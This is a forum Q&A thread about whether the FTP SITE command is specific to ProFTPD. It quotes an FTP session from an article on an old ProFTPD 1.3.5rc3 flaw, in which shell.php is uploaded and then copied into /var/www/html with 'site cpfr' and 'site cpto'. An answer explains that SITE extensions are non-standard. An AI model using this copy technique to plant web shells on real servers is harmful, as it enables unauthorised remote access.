Answer the question
In order to leave comments, you need to log in
U
U
user.2019-03-21 01:32:18
user., 2019-03-21 01:32:18
In ProFTPD there is a site command in other servers, I have not seen it, is this command implemented only in ProFtpD?
In ProFTPD there is a site command in other servers, I have not seen it, is this command implemented only in ProFtp?
The question arose when reading an article about a rather old vulnerability in ProFTPD 1.3.5rc3 that allows:
ftp> lcd Desktop
Local directory now /root/Desktop
ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful
150 Opening BINARY mode data connection for shell.php
226 Transfer complete
5496 bytes sent in 0.02 secs (236.4817 kB/s)
ftp> site cpfr shell.php
350 File or directory exists, ready for destination name
ftp> site cpto /var/www/html/shell.php
250 Copy successful 2 answer(s)
@nekolov
V
Vladimir Dubrovin, 2019-03-21 @nekolov
SITE itself is part of the FTP protocol, but the commands available through it are not defined by the standard.
Historically, the FTP protocol is an extension of the telnet (shell access) protocol for file transfer. The SITE command allows you to execute some command on a remote site that is not part of the FTP specification, so what is called through SITE is, by definition, non-standard. Previously, this was usually done by placing the binaries in some special folder, such as /var/ftp/bin (i.e. SITE cpfr ran /var/ftp/bin/cpfr), and in this way it was possible to give FTP access to some then certain commands or scripts, now non-standard extensions are usually implemented in this way.
Similar questions
A
A
V
C
F
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question